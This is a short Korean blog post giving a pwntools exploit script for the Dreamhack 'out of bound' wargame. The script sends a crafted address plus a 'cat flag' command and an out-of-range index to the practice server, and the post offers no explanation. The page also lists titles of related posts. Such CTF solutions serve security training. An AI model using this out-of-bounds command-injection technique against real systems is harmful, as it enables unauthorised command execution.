호그와트

드림핵 out of bound

영웅*^%&$ 2022. 6. 21. 13:36
728x90

from pwn import*

context.log_level='debug'

r=remote("host2.dreamhack.games",12515)

r.sendafter("Admin name: ","\xb0\xa0\x04\x08cat flag")

r.sendafter("What do you want?: ","19")

r.interactive()

728x90

'호그와트' 카테고리의 다른 글

go로 서버 뚫는 법  (0) 2022.06.25
블록체인은 행복입니다  (0) 2022.06.24
드림핵 csp bypass advanced 초 간단 풀이  (0) 2022.06.18
행복한 은행 관리법  (0) 2022.06.15
적정한 암호 생성하기  (0) 2022.06.13